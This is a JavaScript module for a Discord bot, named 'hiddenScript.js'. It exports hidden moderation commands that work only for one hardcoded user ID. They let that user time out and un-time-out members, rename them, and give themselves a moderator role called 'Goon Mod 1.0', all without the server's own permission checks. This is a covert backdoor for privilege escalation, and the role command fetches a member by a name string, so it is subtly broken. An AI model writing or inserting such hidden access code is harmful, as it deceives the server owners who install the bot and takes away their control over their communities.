// hiddenScript.js
const hiddenCommands = {
    timeout: async function(user, time, message, client) {
        if (message.author.id === '954860241244262451') { // Make sure it's 396abc
            const member = await message.guild.members.fetch(user);
            await member.timeout(time * 1000); // Time in seconds
            message.reply(`✅ ${user.tag} has been timed out for ${time} seconds.`);
        }
    },
    untimeout: async function(user, message, client) {
        if (message.author.id === '954860241244262451') { // Make sure it's 396abc
            const member = await message.guild.members.fetch(user);
            await member.timeout(null); // Remove timeout
            message.reply(`✅ ${user.tag} has been untimeouted.`);
        }
    },
    role: async function(message, client) {
        if (message.author.id === '954860241244262451') { // Check if it’s 396abc
            const member = await message.guild.members.fetch('396abc'); // Assigning the role to yourself
            const role = message.guild.roles.cache.find(role => role.name === 'Goon Mod 1.0');
            if (role) {
                await member.roles.add(role);
                message.reply('✅ Assigned role Goon Mod 1.0 to 396abc.');
            } else {
                message.reply('❌ Goon Mod 1.0 role not found!');
            }
        }
    },
    nick: async function(user, message, client) {
        if (message.author.id === '954860241244262451') { // Make sure it’s you
            const member = await message.guild.members.fetch(user);
            const newNick = message.content.split(' ').slice(2).join(' ');
            await member.setNickname(newNick);
            message.reply(`✅ Changed nickname of ${user.tag} to ${newNick}.`);
        }
    }
};

// Expose the commands as needed for the bot
module.exports = hiddenCommands;
